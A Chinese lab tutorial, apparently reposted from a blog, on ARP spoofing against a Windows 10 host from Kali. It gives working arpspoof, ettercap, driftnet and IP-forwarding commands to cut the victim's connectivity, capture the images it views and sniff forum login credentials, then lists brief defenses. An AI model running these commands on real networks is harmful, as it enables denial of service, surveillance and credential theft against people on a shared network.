局域网安全之ARP攻击

局域网安全之ARP攻击

参考文章:

ARP原理

ARP原理和ARP攻击

实验环境

攻击方:kali 192.168.31.250

受害方:win10 192.168.31.212

准备

主机互ping

kali ping win10 win10 ping kali
image-20210209142353393 image-20210209142429374

arp -a 查看缓存表信息

kali win10
image-20210209142612920 image-20210209142718769

1、断网攻击

攻击流程

方法一:arpspoof

nmap -sP 192.168.31.*

ping扫描整个网段的主机

image-20210209143613416

发现win10主机

扫描二维码关注公众号,回复: 12651865 查看本文章

开始攻击:

arpspoof -i eth0 -t 192.168.31.212 192.168.31.1

image-20210209144447673

发现win10已无法上网

image-20210209144511127

在win10中查看arp缓存表

image-20210209155620714

在kali中Ctrl+C停止攻击,发现win10恢复上网

方法二:使用工具ettercap

ettercap -G 图形化操作

image-20210209145531458

image-20210209145855567

网关地址添加到Target1 win10地址添加到Target2
image-20210209150044390 image-20210209150105984

image-20210209150341856

image-20210209150549490

点击OK开始攻击。

查看win10的arp缓存表

image-20210209150958631

win10的arp缓存表中,网关的MAC地址已被改为kali的,实现中间人攻击。

2、监听图片浏览

攻击流程

在kali开启端口转发功能

cat /proc/sys/net/ipv4/ip_forward

echo 1 > /proc/sys/net/ipv4/ip_forward

//将参数改为1,开启端口转发功能(效果暂时)

image-20210209171952587

或者修改配置文件(效果永久)

vim /etc/sysctl.conf

image-20210209172240328

开始攻击:

arpspoof -i eth0 -t 192.168.31.212 192.168.31.1

image-20210209223910862

driftnet -i eth0 开始捕获图片

image-20210209223854293

win10 kali捕获
image-20210209224033803 image-20210209224103291
  • 使用工具ettercap也可以,大同小异不再赘述

ettercap -i eth0 -Tq -M arp:remote //192.168.31.212// //192.168.31.1//

-i 指定网卡

-Tq 文本模式,安静模式

-M 中间人攻击

image-20210209225928257

3、账号密码的获取

一定要开启端口转发,开启方法上例中有提到。

攻击流程:

使用arpspoof开始arp欺骗

image-20210209233634681

使用ettercap工具捕获账号密码

image-20210209233335562

win10模拟用户登录某论坛

image-20210209233214848

回到kali查看结果

image-20210209233247164

如图已捕获到登录的账号和密码的md5值。

可能是网站有安全设置,试了好几家如百度、京东、搜狐都没捕获成功,最后在某家论坛上实验成功了,为了激动的那一刻不容易啊,哈哈哈。

防御措施

1、使用安全软件(局域网防护,自动绑定网关)

2、手动静态绑定网关的ip与MAC地址

arp -s IP MAC

3、路由器上设置IP与MAC地址绑定

猜你喜欢

转载自blog.csdn.net/qq_43665434/article/details/113787282